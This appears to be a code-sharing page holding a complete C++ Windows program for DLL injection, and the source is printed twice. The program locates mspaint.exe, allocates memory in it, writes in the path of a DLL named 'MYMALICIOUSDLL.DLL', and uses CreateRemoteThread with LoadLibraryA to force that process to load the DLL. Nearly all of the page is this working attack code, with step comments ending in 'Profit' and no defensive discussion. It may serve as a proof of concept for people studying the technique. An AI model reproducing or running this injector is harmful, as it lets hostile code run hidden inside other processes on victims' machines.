christophetd/dll-injection.cpp Secret

## dll-injection.cpp
#include <iostream>
#include <windows.h>
#include "Processthreadsapi.h"
#include "Libloaderapi.h"
#include <tlhelp32.h>
#include "winternl.h"

using namespace std;


int err(const char* msg) {
	cerr << msg << endl;
	return 1;
}

int find_process(const wchar_t* process_name) {
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
	int returnValue = 0;

	if (!Process32First(snapshot, &entry)) {
		goto cleanup;
	}

	while (Process32Next(snapshot, &entry)) {
		if (wcscmp(entry.szExeFile, process_name) == 0) {
			returnValue = entry.th32ProcessID;
			goto cleanup;
		}
	}

cleanup:
	CloseHandle(snapshot);
	return returnValue;

}

#define INJECTION_TARGET L"mspaint.exe"
#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL"

int main()
{
	cout << "Getting handle on target process" << endl;
	int desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
	HANDLE hTargetProcess = OpenProcess(desiredAccess, true, find_process(INJECTION_TARGET));
	if (hTargetProcess == NULL)
		return err("Unable to get a handle on target process");

	// Step 2: Write DLL name in target process memory
	// NOTE: the DLL must be 64-bit
	// Allocate new memory region
	LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, strlen(DLL_TO_INJECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (targetDataPage == NULL)
		err("Unable to allocate memory in target process");

	// Step 2.2: Write DLL path to allocated memory
	if (0 == WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, strlen(DLL_TO_INJECT), NULL))
		return err("Unable to write DLL path to target process memory");

	// Step 3: Get address of the "LoadLibraryA" function
	cout << "Retrieving LoadLibraryA address" << endl;
	HMODULE hModule = GetModuleHandleA("kernel32.dll");
	FARPROC load_library_addr = GetProcAddress(hModule, "LoadLibraryA");
	cout << "LoadLibraryA @ " << load_library_addr << endl;

	// Step 4: CreateRemoteThread with this address and "dllname" as a parameter
	DWORD threadId = 0;
	HANDLE hThread = CreateRemoteThread(
		hTargetProcess,
		NULL,
		0,
		(LPTHREAD_START_ROUTINE) load_library_addr,
		targetDataPage,
		0,
		&threadId
	);
	if (hThread == NULL) {
		cerr << "Unable to create remote thread: error " << GetLastError() << endl;
		return 1;
	}

	// Step 4: Profit
	return 0;
}
	#include <iostream>
	#include <windows.h>
	#include "Processthreadsapi.h"
	#include "Libloaderapi.h"
	#include <tlhelp32.h>
	#include "winternl.h"

	using namespace std;


	int err(const char* msg) {
	cerr << msg << endl;
	return 1;
	}

	int find_process(const wchar_t* process_name) {
	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
	int returnValue = 0;

	if (!Process32First(snapshot, &entry)) {
	goto cleanup;
	}

	while (Process32Next(snapshot, &entry)) {
	if (wcscmp(entry.szExeFile, process_name) == 0) {
	returnValue = entry.th32ProcessID;
	goto cleanup;
	}
	}

	cleanup:
	CloseHandle(snapshot);
	return returnValue;

	}

	#define INJECTION_TARGET L"mspaint.exe"
	#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL"

	int main()
	{
	cout << "Getting handle on target process" << endl;
	int desiredAccess = PROCESS_CREATE_THREAD \| PROCESS_QUERY_INFORMATION \| PROCESS_VM_OPERATION \| PROCESS_VM_WRITE \| PROCESS_VM_READ;
	HANDLE hTargetProcess = OpenProcess(desiredAccess, true, find_process(INJECTION_TARGET));
	if (hTargetProcess == NULL)
	return err("Unable to get a handle on target process");

	// Step 2: Write DLL name in target process memory
	// NOTE: the DLL must be 64-bit
	// Allocate new memory region
	LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, strlen(DLL_TO_INJECT), MEM_COMMIT \| MEM_RESERVE, PAGE_READWRITE);
	if (targetDataPage == NULL)
	err("Unable to allocate memory in target process");

	// Step 2.2: Write DLL path to allocated memory
	if (0 == WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, strlen(DLL_TO_INJECT), NULL))
	return err("Unable to write DLL path to target process memory");

	// Step 3: Get address of the "LoadLibraryA" function
	cout << "Retrieving LoadLibraryA address" << endl;
	HMODULE hModule = GetModuleHandleA("kernel32.dll");
	FARPROC load_library_addr = GetProcAddress(hModule, "LoadLibraryA");
	cout << "LoadLibraryA @ " << load_library_addr << endl;

	// Step 4: CreateRemoteThread with this address and "dllname" as a parameter
	DWORD threadId = 0;
	HANDLE hThread = CreateRemoteThread(
	hTargetProcess,
	NULL,
	0,
	(LPTHREAD_START_ROUTINE) load_library_addr,
	targetDataPage,
	0,
	&threadId
	);
	if (hThread == NULL) {
	cerr << "Unable to create remote thread: error " << GetLastError() << endl;
	return 1;
	}

	// Step 4: Profit
	return 0;
	}